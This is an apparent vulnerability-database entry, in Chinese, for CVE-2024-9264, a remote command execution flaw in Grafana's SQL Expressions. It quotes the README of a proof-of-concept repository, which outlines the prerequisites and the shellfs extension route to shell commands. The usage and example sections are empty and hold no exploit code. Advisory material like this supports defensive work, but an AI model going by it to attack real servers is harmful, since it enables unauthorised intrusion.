Grafana SQL表达式远程代码执行漏洞
漏洞信息
漏洞名称: Grafana SQL表达式远程代码执行漏洞
漏洞编号:
- CVE: CVE-2024-9264
漏洞类型: 命令执行
漏洞等级: 严重
漏洞描述: Grafana是一个开源的度量分析和可视化平台,广泛用于监控和观测数据,支持多种数据源,包括时序数据库如Prometheus、InfluxDB等。它通常被部署在企业级环境中,用于实时监控系统性能和健康状况。由于其强大的功能和灵活性,Grafana在全球范围内被广泛使用。
该漏洞存在于Grafana的SQL表达式功能中,由于输入验证不足,攻击者可以利用此漏洞执行任意shell命令。这一漏洞的根源在于Grafana未能充分清理用户提供的SQL表达式输入,导致攻击者可以通过构造恶意输入绕过安全限制,进而执行系统命令。特别是通过shellfs社区扩展,攻击者可以安装并加载该扩展以促进命令执行。
此漏洞的影响极为严重,因为它允许攻击者在受害服务器上执行任意命令,可能导致数据泄露、服务中断或其他恶意活动。值得注意的是,利用此漏洞需要攻击者拥有至少具有Viewer权限的认证用户凭证。这意味着漏洞的利用需要一定的前置条件,但一旦满足,攻击者可以远程执行代码,无需进一步的身份验证。因此,所有运行受影响版本Grafana的组织都应立即采取行动,应用安全补丁以防止潜在的攻击。
产品厂商: Grafana
产品名称: Grafana
影响版本: >= v11.0.0 (all v11.x.y are impacted)
来源: https://github.com/Royall-Researchers/CVE-2024-9264
类型: CVE-2024:github search
仓库文件
- README.md
- poc.py
来源概述
CVE-2024-9264-RCE-Exploit in Grafana via SQL Expressions
Description
Proof Of Concept for Remote Code Execution in Grafana (CVE-2024-9264)
This repository contains a Python script that exploits a Remote Code Execution (RCE) vulnerability in Grafana’s SQL Expressions feature.
By leveraging insufficient input sanitization, this exploit allows an attacker to execute arbitrary shell commands on the server.
This is made possible through the shellfs community extension, which can be installed and loaded by an attacker to facilitate command execution.
Prerequisites
- authenticated Grafana user with
Viewerpermissions or higher - DuckDB binary must be installed and accessible through Grafana’s PATH
Impacted version
Grafana >= v11.0.0 (all v11.x.y are impacted)
Usage
1 | |
Example
1 | |
Disclaimer
This script is intended for educational purposes and for use in controlled environments where you have permission to test the security of the system. Misuse of this tool could lead to legal consequences.